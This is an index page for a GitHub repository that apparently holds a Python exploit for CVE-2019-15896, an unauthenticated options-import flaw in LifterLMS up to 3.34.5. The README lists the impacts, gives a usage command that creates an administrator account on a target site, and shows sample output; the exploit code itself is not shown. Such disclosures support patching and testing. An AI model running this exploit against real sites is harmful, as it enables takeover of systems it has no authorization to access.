Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/cve-2019-15896
LifterLMS <= 3.34.5 - Unauthenticated Options Import
https://github.com/randomrobbiebf/cve-2019-15896
Last synced: about 1 month ago
JSON representation
LifterLMS <= 3.34.5 - Unauthenticated Options Import
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2019-15896
- Owner: RandomRobbieBF
- License: gpl-3.0
- Created: 2023-08-22T18:56:09.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2023-08-22T18:59:15.000Z (over 1 year ago)
- Last Synced: 2023-08-22T22:57:26.358Z (over 1 year ago)
- Language: Python
- Size: 17.6 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# CVE-2019-15896
LifterLMS <= 3.34.5 - Unauthenticated Options Import# Description
Unauthenticated Options Import, which could lead to
- Website Redirection
- Administrator Account Creation
- Content Injection
- Stored XSS
The issues have been reported as fixed in 3.35.0. However v3.35.1 added additional input sanitisation and filtering.
How to use
---
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email [email protected]
LifterLMS <= 3.34.5 - Unauthenticated Options Import
Exploit By Ramdom Robbie
Once ran check your email for the forgotten password link.
Password reset email sent to [email protected]
```Info
---```
Requires access to login.php and working email address and the site needs to be able to send emails
```